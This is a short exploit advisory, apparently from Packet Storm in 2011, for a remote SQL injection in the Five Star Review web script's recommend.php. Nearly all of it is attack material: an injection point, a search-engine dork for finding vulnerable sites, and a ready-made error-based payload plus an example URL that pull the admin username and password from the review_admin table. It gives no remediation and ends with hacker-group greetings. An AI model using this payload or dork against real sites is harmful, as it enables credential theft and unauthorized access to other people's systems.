Five Star Review Remote SQL Injection

2011-12-06T00:00:00
ID PACKETSTORM:107539
Type packetstorm
Reporter EthicalPractice
Modified 2011-12-06T00:00:00

Description

                                        
                                            `################################################################################################  
# Exploit Title: Five Star Review Remote SQL Injection (recommend.php)  
# Script Page : http://www.review-script.com  
# Date: 5-12-2011  
# Version: Versions below v5.1  
# Author : EthicalPractice  
# Tested on: Firefox 8.0, Palemoon 8.0, Internet Explorer 9  
# Note: This exploit works on the older versions ONLY.  
################################################################################################  
  
## Injection Point : /recommend.php?item_id=[SQL]  
## Dork: intext:"Powered by Five Star Review" + inurl:recommend.php  
  
## Exploit Code: +and+(select 1  
from(select+count(*),concat((select+concat(username,0x3a,passtext) from  
review_admin+limit+0,1),floor(rand(0)*2))a from  
information_schema.tables+group by a)b)  
  
  
## Example: /recommend.php?item_id=-1+and+(select 1  
from(select+count(*),concat((select+concat(username,0x3a,passtext) from  
review_admin+limit+0,1),floor(rand(0)*2))a from  
information_schema.tables+group by a)b)  
  
  
################################################################################################  
  
# Team Intra till I die.  
# Greets to thethatguy, Haxor, kaledori, Zelos, Mx., exc3llent, skynet,  
m00dy, v3xr, Codine, Classy, VipVince, Dan, Prominent, Gringoire, hac  
  
`